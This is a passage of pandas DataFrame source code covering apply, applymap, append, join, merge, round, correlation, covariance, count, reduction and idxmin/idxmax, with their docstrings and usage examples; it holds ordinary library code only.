are expanded to columns.
args : tuple
Positional arguments to pass to `func` in addition to the
array/series.
**kwds
Additional keyword arguments to pass as keywords arguments to
`func`.
Returns
-------
Series or DataFrame
Result of applying ``func`` along the given axis of the
DataFrame.
See Also
--------
DataFrame.applymap: For elementwise operations.
DataFrame.aggregate: Only perform aggregating type operations.
DataFrame.transform: Only perform transforming type operations.
Examples
--------
>>> df = pd.DataFrame([[4, 9]] * 3, columns=['A', 'B'])
>>> df
A B
0 4 9
1 4 9
2 4 9
Using a numpy universal function (in this case the same as
``np.sqrt(df)``):
>>> df.apply(np.sqrt)
A B
0 2.0 3.0
1 2.0 3.0
2 2.0 3.0
Using a reducing function on either axis
>>> df.apply(np.sum, axis=0)
A 12
B 27
dtype: int64
>>> df.apply(np.sum, axis=1)
0 13
1 13
2 13
dtype: int64
Returning a list-like will result in a Series
>>> df.apply(lambda x: [1, 2], axis=1)
0 [1, 2]
1 [1, 2]
2 [1, 2]
dtype: object
Passing ``result_type='expand'`` will expand list-like results
to columns of a Dataframe
>>> df.apply(lambda x: [1, 2], axis=1, result_type='expand')
0 1
0 1 2
1 1 2
2 1 2
Returning a Series inside the function is similar to passing
``result_type='expand'``. The resulting column names
will be the Series index.
>>> df.apply(lambda x: pd.Series([1, 2], index=['foo', 'bar']), axis=1)
foo bar
0 1 2
1 1 2
2 1 2
Passing ``result_type='broadcast'`` will ensure the same shape
result, whether list-like or scalar is returned by the function,
and broadcast it along the axis. The resulting column names will
be the originals.
>>> df.apply(lambda x: [1, 2], axis=1, result_type='broadcast')
A B
0 1 2
1 1 2
2 1 2
"""
from pandas.core.apply import frame_apply
op = frame_apply(
self,
func=func,
axis=axis,
raw=raw,
result_type=result_type,
args=args,
kwds=kwds,
)
return op.get_result()
def applymap(self, func, na_action: Optional[str] = None) -> DataFrame:
"""
Apply a function to a Dataframe elementwise.
This method applies a function that accepts and returns a scalar
to every element of a DataFrame.
Parameters
----------
func : callable
Python function, returns a single value from a single value.
na_action : {None, 'ignore'}, default None
If ‘ignore’, propagate NaN values, without passing them to func.
.. versionadded:: 1.2
Returns
-------
DataFrame
Transformed DataFrame.
See Also
--------
DataFrame.apply : Apply a function along input axis of DataFrame.
Examples
--------
>>> df = pd.DataFrame([[1, 2.12], [3.356, 4.567]])
>>> df
0 1
0 1.000 2.120
1 3.356 4.567
>>> df.applymap(lambda x: len(str(x)))
0 1
0 3 4
1 5 5
Like Series.map, NA values can be ignored:
>>> df_copy = df.copy()
>>> df_copy.iloc[0, 0] = pd.NA
>>> df_copy.applymap(lambda x: len(str(x)), na_action='ignore')
0 1
0 <NA> 4
1 5 5
Note that a vectorized version of `func` often exists, which will
be much faster. You could square each number elementwise.
>>> df.applymap(lambda x: x**2)
0 1
0 1.000000 4.494400
1 11.262736 20.857489
But it's better to avoid applymap in that case.
>>> df ** 2
0 1
0 1.000000 4.494400
1 11.262736 20.857489
"""
if na_action not in {"ignore", None}:
raise ValueError(
f"na_action must be 'ignore' or None. Got {repr(na_action)}"
)
ignore_na = na_action == "ignore"
# if we have a dtype == 'M8[ns]', provide boxed values
def infer(x):
if x.empty:
return lib.map_infer(x, func, ignore_na=ignore_na)
return lib.map_infer(x.astype(object)._values, func, ignore_na=ignore_na)
return self.apply(infer)
# ----------------------------------------------------------------------
# Merging / joining methods
def append(
self, other, ignore_index=False, verify_integrity=False, sort=False
) -> DataFrame:
"""
Append rows of `other` to the end of caller, returning a new object.
Columns in `other` that are not in the caller are added as new columns.
Parameters
----------
other : DataFrame or Series/dict-like object, or list of these
The data to append.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
verify_integrity : bool, default False
If True, raise ValueError on creating index with duplicates.
sort : bool, default False
Sort columns if the columns of `self` and `other` are not aligned.
.. versionchanged:: 1.0.0
Changed to not sort by default.
Returns
-------
DataFrame
See Also
--------
concat : General function to concatenate DataFrame or Series objects.
Notes
-----
If a list of dict/series is passed and the keys are all contained in
the DataFrame's index, the order of the columns in the resulting
DataFrame will be unchanged.
Iteratively appending rows to a DataFrame can be more computationally
intensive than a single concatenate. A better solution is to append
those rows to a list and then concatenate the list with the original
DataFrame all at once.
Examples
--------
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=list('AB'))
>>> df
A B
0 1 2
1 3 4
>>> df2 = pd.DataFrame([[5, 6], [7, 8]], columns=list('AB'))
>>> df.append(df2)
A B
0 1 2
1 3 4
0 5 6
1 7 8
With `ignore_index` set to True:
>>> df.append(df2, ignore_index=True)
A B
0 1 2
1 3 4
2 5 6
3 7 8
The following, while not recommended methods for generating DataFrames,
show two ways to generate a DataFrame from multiple data sources.
Less efficient:
>>> df = pd.DataFrame(columns=['A'])
>>> for i in range(5):
... df = df.append({'A': i}, ignore_index=True)
>>> df
A
0 0
1 1
2 2
3 3
4 4
More efficient:
>>> pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],
... ignore_index=True)
A
0 0
1 1
2 2
3 3
4 4
"""
if isinstance(other, (Series, dict)):
if isinstance(other, dict):
if not ignore_index:
raise TypeError("Can only append a dict if ignore_index=True")
other = Series(other)
if other.name is None and not ignore_index:
raise TypeError(
"Can only append a Series if ignore_index=True "
"or if the Series has a name"
)
index = Index([other.name], name=self.index.name)
idx_diff = other.index.difference(self.columns)
try:
combined_columns = self.columns.append(idx_diff)
except TypeError:
combined_columns = self.columns.astype(object).append(idx_diff)
other = (
other.reindex(combined_columns, copy=False)
.to_frame()
.T.infer_objects()
.rename_axis(index.names, copy=False)
)
if not self.columns.equals(combined_columns):
self = self.reindex(columns=combined_columns)
elif isinstance(other, list):
if not other:
pass
elif not isinstance(other[0], DataFrame):
other = DataFrame(other)
if (self.columns.get_indexer(other.columns) >= 0).all():
other = other.reindex(columns=self.columns)
from pandas.core.reshape.concat import concat
if isinstance(other, (list, tuple)):
to_concat = [self, *other]
else:
to_concat = [self, other]
return concat(
to_concat,
ignore_index=ignore_index,
verify_integrity=verify_integrity,
sort=sort,
)
def join(
self, other, on=None, how="left", lsuffix="", rsuffix="", sort=False
) -> DataFrame:
"""
Join columns of another DataFrame.
Join columns with `other` DataFrame either on index or on a key
column. Efficiently join multiple DataFrame objects by index at once by
passing a list.
Parameters
----------
other : DataFrame, Series, or list of DataFrame
Index should be similar to one of the columns in this one. If a
Series is passed, its name attribute must be set, and that will be
used as the column name in the resulting joined DataFrame.
on : str, list of str, or array-like, optional
Column or index level name(s) in the caller to join on the index
in `other`, otherwise joins index-on-index. If multiple
values given, the `other` DataFrame must have a MultiIndex. Can
pass an array as the join key if it is not already contained in
the calling DataFrame. Like an Excel VLOOKUP operation.
how : {'left', 'right', 'outer', 'inner'}, default 'left'
How to handle the operation of the two objects.
* left: use calling frame's index (or column if on is specified)
* right: use `other`'s index.
* outer: form union of calling frame's index (or column if on is
specified) with `other`'s index, and sort it.
lexicographically.
* inner: form intersection of calling frame's index (or column if
on is specified) with `other`'s index, preserving the order
of the calling's one.
lsuffix : str, default ''
Suffix to use from left frame's overlapping columns.
rsuffix : str, default ''
Suffix to use from right frame's overlapping columns.
sort : bool, default False
Order result DataFrame lexicographically by the join key. If False,
the order of the join key depends on the join type (how keyword).
Returns
-------
DataFrame
A dataframe containing columns from both the caller and `other`.
See Also
--------
DataFrame.merge : For column(s)-on-columns(s) operations.
Notes
-----
Parameters `on`, `lsuffix`, and `rsuffix` are not supported when
passing a list of `DataFrame` objects.
Support for specifying index levels as the `on` parameter was added
in version 0.23.0.
Examples
--------
>>> df = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3', 'K4', 'K5'],
... 'A': ['A0', 'A1', 'A2', 'A3', 'A4', 'A5']})
>>> df
key A
0 K0 A0
1 K1 A1
2 K2 A2
3 K3 A3
4 K4 A4
5 K5 A5
>>> other = pd.DataFrame({'key': ['K0', 'K1', 'K2'],
... 'B': ['B0', 'B1', 'B2']})
>>> other
key B
0 K0 B0
1 K1 B1
2 K2 B2
Join DataFrames using their indexes.
>>> df.join(other, lsuffix='_caller', rsuffix='_other')
key_caller A key_other B
0 K0 A0 K0 B0
1 K1 A1 K1 B1
2 K2 A2 K2 B2
3 K3 A3 NaN NaN
4 K4 A4 NaN NaN
5 K5 A5 NaN NaN
If we want to join using the key columns, we need to set key to be
the index in both `df` and `other`. The joined DataFrame will have
key as its index.
>>> df.set_index('key').join(other.set_index('key'))
A B
key
K0 A0 B0
K1 A1 B1
K2 A2 B2
K3 A3 NaN
K4 A4 NaN
K5 A5 NaN
Another option to join using the key columns is to use the `on`
parameter. DataFrame.join always uses `other`'s index but we can use
any column in `df`. This method preserves the original DataFrame's
index in the result.
>>> df.join(other.set_index('key'), on='key')
key A B
0 K0 A0 B0
1 K1 A1 B1
2 K2 A2 B2
3 K3 A3 NaN
4 K4 A4 NaN
5 K5 A5 NaN
"""
return self._join_compat(
other, on=on, how=how, lsuffix=lsuffix, rsuffix=rsuffix, sort=sort
)
def _join_compat(
self, other, on=None, how="left", lsuffix="", rsuffix="", sort=False
):
from pandas.core.reshape.concat import concat
from pandas.core.reshape.merge import merge
if isinstance(other, Series):
if other.name is None:
raise ValueError("Other Series must have a name")
other = DataFrame({other.name: other})
if isinstance(other, DataFrame):
return merge(
self,
other,
left_on=on,
how=how,
left_index=on is None,
right_index=True,
suffixes=(lsuffix, rsuffix),
sort=sort,
)
else:
if on is not None:
raise ValueError(
"Joining multiple DataFrames only supported for joining on index"
)
frames = [self] + list(other)
can_concat = all(df.index.is_unique for df in frames)
# join indexes only using concat
if can_concat:
if how == "left":
res = concat(
frames, axis=1, join="outer", verify_integrity=True, sort=sort
)
return res.reindex(self.index, copy=False)
else:
return concat(
frames, axis=1, join=how, verify_integrity=True, sort=sort
)
joined = frames[0]
for frame in frames[1:]:
joined = merge(
joined, frame, how=how, left_index=True, right_index=True
)
return joined
@Substitution("")
@Appender(_merge_doc, indents=2)
def merge(
self,
right,
how="inner",
on=None,
left_on=None,
right_on=None,
left_index=False,
right_index=False,
sort=False,
suffixes=("_x", "_y"),
copy=True,
indicator=False,
validate=None,
) -> DataFrame:
from pandas.core.reshape.merge import merge
return merge(
self,
right,
how=how,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
sort=sort,
suffixes=suffixes,
copy=copy,
indicator=indicator,
validate=validate,
)
def round(self, decimals=0, *args, **kwargs) -> DataFrame:
"""
Round a DataFrame to a variable number of decimal places.
Parameters
----------
decimals : int, dict, Series
Number of decimal places to round each column to. If an int is
given, round each column to the same number of places.
Otherwise dict and Series round to variable numbers of places.
Column names should be in the keys if `decimals` is a
dict-like, or in the index if `decimals` is a Series. Any
columns not included in `decimals` will be left as is. Elements
of `decimals` which are not columns of the input will be
ignored.
*args
Additional keywords have no effect but might be accepted for
compatibility with numpy.
**kwargs
Additional keywords have no effect but might be accepted for
compatibility with numpy.
Returns
-------
DataFrame
A DataFrame with the affected columns rounded to the specified
number of decimal places.
See Also
--------
numpy.around : Round a numpy array to the given number of decimals.
Series.round : Round a Series to the given number of decimals.
Examples
--------
>>> df = pd.DataFrame([(.21, .32), (.01, .67), (.66, .03), (.21, .18)],
... columns=['dogs', 'cats'])
>>> df
dogs cats
0 0.21 0.32
1 0.01 0.67
2 0.66 0.03
3 0.21 0.18
By providing an integer each column is rounded to the same number
of decimal places
>>> df.round(1)
dogs cats
0 0.2 0.3
1 0.0 0.7
2 0.7 0.0
3 0.2 0.2
With a dict, the number of places for specific columns can be
specified with the column names as key and the number of decimal
places as value
>>> df.round({'dogs': 1, 'cats': 0})
dogs cats
0 0.2 0.0
1 0.0 1.0
2 0.7 0.0
3 0.2 0.0
Using a Series, the number of places for specific columns can be
specified with the column names as index and the number of
decimal places as value
>>> decimals = pd.Series([0, 1], index=['cats', 'dogs'])
>>> df.round(decimals)
dogs cats
0 0.2 0.0
1 0.0 1.0
2 0.7 0.0
3 0.2 0.0
"""
from pandas.core.reshape.concat import concat
def _dict_round(df, decimals):
for col, vals in df.items():
try:
yield _series_round(vals, decimals[col])
except KeyError:
yield vals
def _series_round(s, decimals):
if is_integer_dtype(s) or is_float_dtype(s):
return s.round(decimals)
return s
nv.validate_round(args, kwargs)
if isinstance(decimals, (dict, Series)):
if isinstance(decimals, Series):
if not decimals.index.is_unique:
raise ValueError("Index of decimals must be unique")
new_cols = list(_dict_round(self, decimals))
elif is_integer(decimals):
# Dispatch to Series.round
new_cols = [_series_round(v, decimals) for _, v in self.items()]
else:
raise TypeError("decimals must be an integer, a dict-like or a Series")
if len(new_cols) > 0:
return self._constructor(
concat(new_cols, axis=1), index=self.index, columns=self.columns
)
else:
return self
# ----------------------------------------------------------------------
# Statistical methods, etc.
def corr(self, method="pearson", min_periods=1) -> DataFrame:
"""
Compute pairwise correlation of columns, excluding NA/null values.
Parameters
----------
method : {'pearson', 'kendall', 'spearman'} or callable
Method of correlation:
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
* callable: callable with input two 1d ndarrays
and returning a float. Note that the returned matrix from corr
will have 1 along the diagonals and will be symmetric
regardless of the callable's behavior.
.. versionadded:: 0.24.0
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result. Currently only available for Pearson
and Spearman correlation.
Returns
-------
DataFrame
Correlation matrix.
See Also
--------
DataFrame.corrwith : Compute pairwise correlation with another
DataFrame or Series.
Series.corr : Compute the correlation between two Series.
Examples
--------
>>> def histogram_intersection(a, b):
... v = np.minimum(a, b).sum().round(decimals=1)
... return v
>>> df = pd.DataFrame([(.2, .3), (.0, .6), (.6, .0), (.2, .1)],
... columns=['dogs', 'cats'])
>>> df.corr(method=histogram_intersection)
dogs cats
dogs 1.0 0.3
cats 0.3 1.0
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.to_numpy(dtype=float, na_value=np.nan, copy=False)
if method == "pearson":
correl = libalgos.nancorr(mat, minp=min_periods)
elif method == "spearman":
correl = libalgos.nancorr_spearman(mat, minp=min_periods)
elif method == "kendall" or callable(method):
if min_periods is None:
min_periods = 1
mat = mat.T
corrf = nanops.get_corr_func(method)
K = len(cols)
correl = np.empty((K, K), dtype=float)
mask = np.isfinite(mat)
for i, ac in enumerate(mat):
for j, bc in enumerate(mat):
if i > j:
continue
valid = mask[i] & mask[j]
if valid.sum() < min_periods:
c = np.nan
elif i == j:
c = 1.0
elif not valid.all():
c = corrf(ac[valid], bc[valid])
else:
c = corrf(ac, bc)
correl[i, j] = c
correl[j, i] = c
else:
raise ValueError(
"method must be either 'pearson', "
"'spearman', 'kendall', or a callable, "
f"'{method}' was supplied"
)
return self._constructor(correl, index=idx, columns=cols)
def cov(
self, min_periods: Optional[int] = None, ddof: Optional[int] = 1
) -> DataFrame:
"""
Compute pairwise covariance of columns, excluding NA/null values.
Compute the pairwise covariance among the series of a DataFrame.
The returned data frame is the `covariance matrix
<https://en.wikipedia.org/wiki/Covariance_matrix>`__ of the columns
of the DataFrame.
Both NA and null values are automatically excluded from the
calculation. (See the note below about bias from missing values.)
A threshold can be set for the minimum number of
observations for each value created. Comparisons with observations
below this threshold will be returned as ``NaN``.
This method is generally used for the analysis of time series data to
understand the relationship between different measures
across time.
Parameters
----------
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result.
ddof : int, default 1
Delta degrees of freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
The covariance matrix of the series of the DataFrame.
See Also
--------
Series.cov : Compute covariance with another Series.
core.window.ExponentialMovingWindow.cov: Exponential weighted sample covariance.
core.window.Expanding.cov : Expanding sample covariance.
core.window.Rolling.cov : Rolling sample covariance.
Notes
-----
Returns the covariance matrix of the DataFrame's time series.
The covariance is normalized by N-ddof.
For DataFrames that have Series that are missing data (assuming that
data is `missing at random
<https://en.wikipedia.org/wiki/Missing_data#Missing_at_random>`__)
the returned covariance matrix will be an unbiased estimate
of the variance and covariance between the member Series.
However, for many applications this estimate may not be acceptable
because the estimate covariance matrix is not guaranteed to be positive
semi-definite. This could lead to estimate correlations having
absolute values which are greater than one, and/or a non-invertible
covariance matrix. See `Estimation of covariance matrices
<https://en.wikipedia.org/w/index.php?title=Estimation_of_covariance_
matrices>`__ for more details.
Examples
--------
>>> df = pd.DataFrame([(1, 2), (0, 3), (2, 0), (1, 1)],
... columns=['dogs', 'cats'])
>>> df.cov()
dogs cats
dogs 0.666667 -1.000000
cats -1.000000 1.666667
>>> np.random.seed(42)
>>> df = pd.DataFrame(np.random.randn(1000, 5),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df.cov()
a b c d e
a 0.998438 -0.020161 0.059277 -0.008943 0.014144
b -0.020161 1.059352 -0.008543 -0.024738 0.009826
c 0.059277 -0.008543 1.010670 -0.001486 -0.000271
d -0.008943 -0.024738 -0.001486 0.921297 -0.013692
e 0.014144 0.009826 -0.000271 -0.013692 0.977795
**Minimum number of periods**
This method also supports an optional ``min_periods`` keyword
that specifies the required minimum number of non-NA observations for
each column pair in order to have a valid result:
>>> np.random.seed(42)
>>> df = pd.DataFrame(np.random.randn(20, 3),
... columns=['a', 'b', 'c'])
>>> df.loc[df.index[:5], 'a'] = np.nan
>>> df.loc[df.index[5:10], 'b'] = np.nan
>>> df.cov(min_periods=12)
a b c
a 0.316741 NaN -0.150812
b NaN 1.248003 0.191417
c -0.150812 0.191417 0.895202
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.to_numpy(dtype=float, na_value=np.nan, copy=False)
if notna(mat).all():
if min_periods is not None and min_periods > len(mat):
base_cov = np.empty((mat.shape[1], mat.shape[1]))
base_cov.fill(np.nan)
else:
base_cov = np.cov(mat.T, ddof=ddof)
base_cov = base_cov.reshape((len(cols), len(cols)))
else:
base_cov = libalgos.nancorr(mat, cov=True, minp=min_periods)
return self._constructor(base_cov, index=idx, columns=cols)
def corrwith(self, other, axis=0, drop=False, method="pearson") -> Series:
"""
Compute pairwise correlation.
Pairwise correlation is computed between rows or columns of
DataFrame with rows or columns of Series or DataFrame. DataFrames
are first aligned along both axes before computing the
correlations.
Parameters
----------
other : DataFrame, Series
Object with which to compute correlations.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' to compute column-wise, 1 or 'columns' for
row-wise.
drop : bool, default False
Drop missing indices from result.
method : {'pearson', 'kendall', 'spearman'} or callable
Method of correlation:
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
* callable: callable with input two 1d ndarrays
and returning a float.
.. versionadded:: 0.24.0
Returns
-------
Series
Pairwise correlations.
See Also
--------
DataFrame.corr : Compute pairwise correlation of columns.
"""
axis = self._get_axis_number(axis)
this = self._get_numeric_data()
if isinstance(other, Series):
return this.apply(lambda x: other.corr(x, method=method), axis=axis)
other = other._get_numeric_data()
left, right = this.align(other, join="inner", copy=False)
if axis == 1:
left = left.T
right = right.T
if method == "pearson":
# mask missing values
left = left + right * 0
right = right + left * 0
# demeaned data
ldem = left - left.mean()
rdem = right - right.mean()
num = (ldem * rdem).sum()
dom = (left.count() - 1) * left.std() * right.std()
correl = num / dom
elif method in ["kendall", "spearman"] or callable(method):
def c(x):
return nanops.nancorr(x[0], x[1], method=method)
correl = self._constructor_sliced(
map(c, zip(left.values.T, right.values.T)), index=left.columns
)
else:
raise ValueError(
f"Invalid method {method} was passed, "
"valid methods are: 'pearson', 'kendall', "
"'spearman', or callable"
)
if not drop:
# Find non-matching labels along the given axis
# and append missing correlations (GH 22375)
raxis = 1 if axis == 0 else 0
result_index = this._get_axis(raxis).union(other._get_axis(raxis))
idx_diff = result_index.difference(correl.index)
if len(idx_diff) > 0:
correl = correl.append(Series([np.nan] * len(idx_diff), index=idx_diff))
return correl
# ----------------------------------------------------------------------
# ndarray-like stats methods
def count(self, axis=0, level=None, numeric_only=False):
"""
Count non-NA cells for each column or row.
The values `None`, `NaN`, `NaT`, and optionally `numpy.inf` (depending
on `pandas.options.mode.use_inf_as_na`) are considered NA.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
If 0 or 'index' counts are generated for each column.
If 1 or 'columns' counts are generated for each row.
level : int or str, optional
If the axis is a `MultiIndex` (hierarchical), count along a
particular `level`, collapsing into a `DataFrame`.
A `str` specifies the level name.
numeric_only : bool, default False
Include only `float`, `int` or `boolean` data.
Returns
-------
Series or DataFrame
For each column/row the number of non-NA/null entries.
If `level` is specified returns a `DataFrame`.
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.shape: Number of DataFrame rows and columns (including NA
elements).
DataFrame.isna: Boolean same-sized DataFrame showing places of NA
elements.
Examples
--------
Constructing DataFrame from a dictionary:
>>> df = pd.DataFrame({"Person":
... ["John", "Myla", "Lewis", "John", "Myla"],
... "Age": [24., np.nan, 21., 33, 26],
... "Single": [False, True, True, True, False]})
>>> df
Person Age Single
0 John 24.0 False
1 Myla NaN True
2 Lewis 21.0 True
3 John 33.0 True
4 Myla 26.0 False
Notice the uncounted NA values:
>>> df.count()
Person 5
Age 4
Single 5
dtype: int64
Counts for each **row**:
>>> df.count(axis='columns')
0 3
1 2
2 3
3 3
4 3
dtype: int64
Counts for one level of a `MultiIndex`:
>>> df.set_index(["Person", "Single"]).count(level="Person")
Age
Person
John 2
Lewis 1
Myla 1
"""
axis = self._get_axis_number(axis)
if level is not None:
return self._count_level(level, axis=axis, numeric_only=numeric_only)
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
# GH #423
if len(frame._get_axis(axis)) == 0:
result = self._constructor_sliced(0, index=frame._get_agg_axis(axis))
else:
if frame._is_mixed_type or frame._mgr.any_extension_types:
# the or any_extension_types is really only hit for single-
# column frames with an extension array
result = notna(frame).sum(axis=axis)
else:
# GH13407
series_counts = notna(frame).sum(axis=axis)
counts = series_counts.values
result = self._constructor_sliced(
counts, index=frame._get_agg_axis(axis)
)
return result.astype("int64")
def _count_level(self, level, axis=0, numeric_only=False):
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
count_axis = frame._get_axis(axis)
agg_axis = frame._get_agg_axis(axis)
if not isinstance(count_axis, MultiIndex):
raise TypeError(
f"Can only count levels on hierarchical {self._get_axis_name(axis)}."
)
# Mask NaNs: Mask rows or columns where the index level is NaN, and all
# values in the DataFrame that are NaN
if frame._is_mixed_type:
# Since we have mixed types, calling notna(frame.values) might
# upcast everything to object
values_mask = notna(frame).values
else:
# But use the speedup when we have homogeneous dtypes
values_mask = notna(frame.values)
index_mask = notna(count_axis.get_level_values(level=level))
if axis == 1:
mask = index_mask & values_mask
else:
mask = index_mask.reshape(-1, 1) & values_mask
if isinstance(level, str):
level = count_axis._get_level_number(level)
level_name = count_axis._names[level]
level_index = count_axis.levels[level]._shallow_copy(name=level_name)
level_codes = ensure_int64(count_axis.codes[level])
counts = lib.count_level_2d(mask, level_codes, len(level_index), axis=axis)
if axis == 1:
result = self._constructor(counts, index=agg_axis, columns=level_index)
else:
result = self._constructor(counts, index=level_index, columns=agg_axis)
return result
def _reduce(
self,
op,
name: str,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
assert filter_type is None or filter_type == "bool", filter_type
out_dtype = "bool" if filter_type == "bool" else None
dtype_is_dt = np.array(
[
is_datetime64_any_dtype(values.dtype)
for values in self._iter_column_arrays()
],
dtype=bool,
)
if numeric_only is None and name in ["mean", "median"] and dtype_is_dt.any():
warnings.warn(
"DataFrame.mean and DataFrame.median with numeric_only=None "
"will include datetime64 and datetime64tz columns in a "
"future version.",
FutureWarning,
stacklevel=5,
)
cols = self.columns[~dtype_is_dt]
self = self[cols]
any_object = self.dtypes.apply(is_object_dtype).any()
# TODO: Make other agg func handle axis=None properly GH#21597
axis = self._get_axis_number(axis)
labels = self._get_agg_axis(axis)
assert axis in [0, 1]
def func(values):
if is_extension_array_dtype(values.dtype):
return extract_array(values)._reduce(name, skipna=skipna, **kwds)
else:
return op(values, axis=axis, skipna=skipna, **kwds)
def blk_func(values):
if isinstance(values, ExtensionArray):
return values._reduce(name, skipna=skipna, **kwds)
else:
return op(values, axis=1, skipna=skipna, **kwds)
def _get_data() -> DataFrame:
if filter_type is None:
data = self._get_numeric_data()
else:
# GH#25101, GH#24434
assert filter_type == "bool"
data = self._get_bool_data()
return data
if numeric_only is not None or (
numeric_only is None
and axis == 0
and not any_object
and not self._mgr.any_extension_types
):
# For numeric_only non-None and axis non-None, we know
# which blocks to use and no try/except is needed.
# For numeric_only=None only the case with axis==0 and no object
# dtypes are unambiguous can be handled with BlockManager.reduce
# Case with EAs see GH#35881
df = self
if numeric_only is True:
df = _get_data()
if axis == 1:
df = df.T
axis = 0
ignore_failures = numeric_only is None
# After possibly _get_data and transposing, we are now in the
# simple case where we can use BlockManager.reduce
res, indexer = df._mgr.reduce(blk_func, ignore_failures=ignore_failures)
out = df._constructor(res).iloc[0]
if out_dtype is not None:
out = out.astype(out_dtype)
if axis == 0 and is_object_dtype(out.dtype):
# GH#35865 careful to cast explicitly to object
nvs = coerce_to_dtypes(out.values, df.dtypes.iloc[np.sort(indexer)])
out[:] = np.array(nvs, dtype=object)
return out
assert numeric_only is None
if not self._is_homogeneous_type or self._mgr.any_extension_types:
# try to avoid self.values call
if filter_type is None and axis == 0:
# operate column-wise
# numeric_only must be None here, as other cases caught above
# this can end up with a non-reduction
# but not always. if the types are mixed
# with datelike then need to make sure a series
# we only end up here if we have not specified
# numeric_only and yet we have tried a
# column-by-column reduction, where we have mixed type.
# So let's just do what we can
from pandas.core.apply import frame_apply
opa = frame_apply(
self, func=func, result_type="expand", ignore_failures=True
)
result = opa.get_result()
if result.ndim == self.ndim:
result = result.iloc[0].rename(None)
return result
data = self
values = data.values
try:
result = func(values)
except TypeError:
# e.g. in nanops trying to convert strs to float
data = _get_data()
labels = data._get_agg_axis(axis)
values = data.values
with np.errstate(all="ignore"):
result = func(values)
if filter_type == "bool" and notna(result).all():
result = result.astype(np.bool_)
elif filter_type is None and is_object_dtype(result.dtype):
try:
result = result.astype(np.float64)
except (ValueError, TypeError):
# try to coerce to the original dtypes item by item if we can
if axis == 0:
result = coerce_to_dtypes(result, data.dtypes)
result = self._constructor_sliced(result, index=labels)
return result
def nunique(self, axis=0, dropna=True) -> Series:
"""
Count distinct observations over requested axis.
Return Series with number of distinct observations. Can ignore NaN
values.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' for row-wise, 1 or 'columns' for
column-wise.
dropna : bool, default True
Don't include NaN in the counts.
Returns
-------
Series
See Also
--------
Series.nunique: Method nunique for Series.
DataFrame.count: Count non-NA cells for each column or row.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 1, 1]})
>>> df.nunique()
A 3
B 1
dtype: int64
>>> df.nunique(axis=1)
0 1
1 2
2 2
dtype: int64
"""
return self.apply(Series.nunique, axis=axis, dropna=dropna)
def idxmin(self, axis=0, skipna=True) -> Series:
"""
Return index of first occurrence of minimum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' for row-wise, 1 or 'columns' for column-wise.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Returns
-------
Series
Indexes of minima along the specified axis.
Raises
------
ValueError
* If the row/column is empty
See Also
--------
Series.idxmin : Return index of the minimum element.
Notes
-----
This method is the DataFrame version of ``ndarray.argmin``.
Examples
--------
Consider a dataset containing food consumption in Argentina.
>>> df = pd.DataFrame({'consumption': [10.51, 103.11, 55.48],
... 'co2_emissions': [37.2, 19.66, 1712]},
... index=['Pork', 'Wheat Products', 'Beef'])
>>> df
consumption co2_emissions
Pork 10.51 37.20
Wheat Products 103.11 19.66
Beef 55.48 1712.00
By default, it returns the index for the minimum value in each column.
>>> df.idxmin()
consumption Pork
co2_emissions Wheat Products
dtype: object
To return the index for the minimum value in each row, use ``axis="columns"``.
>>> df.idxmin(axis="columns")
Pork consumption
Wheat Products co2_emissions
Beef consumption
dtype: object
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmin(self.values, axis=axis, skipna=skipna)
# indices will always be np.ndarray since axis is not None and
# values is a 2d array for DataFrame
# error: Item "int" of "Union[int, Any]" has no attribute "__iter__"
assert isinstance(indices, np.ndarray) # for mypy
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return self._constructor_sliced(result, index=self._get_agg_axis(axis))
def idxmax(self, axis=0, skipna=True) -> Series:
"""
Return index of first occurrence of maximum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' for row-wise, 1 or 'columns' for column-wise.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Returns
-------
Series
Indexes of maxima along the specified axis.
Raises
------
ValueError
* If the row/column is empty
See Also
--------
Series.idxmax : Return index of the maximum element.
Notes
-----
This method is the DataFrame version of ``ndarray.argmax``.
Examples
--------
Consider a dataset containing food consumption in Argentina.
>>> df = pd.DataFrame({'consumption': [10.51, 103.11, 55.48],
... 'co2_emissions': [37.2, 19.66, 1712]},
... index=['Pork', 'Wheat Products', 'Beef'])
>>> df
consumption co2_emissions
Pork 10.51 37.20
Wheat Products 103.11 19.66
Beef 55.48 1712.00
By default, it returns the index for the maximum value in each column.
>>> df.idxmax()
consumption Wheat Products
co2_emissions Beef
dtype: object
To return the index for the maximum value in each row, use ``axis="columns"``.
>>> df.idxmax(axis="columns")
Pork co2_emissions
Wheat Products consumption
Beef co2_emissions
dtype: object
"""
axis = self._get_axis_number(axis)
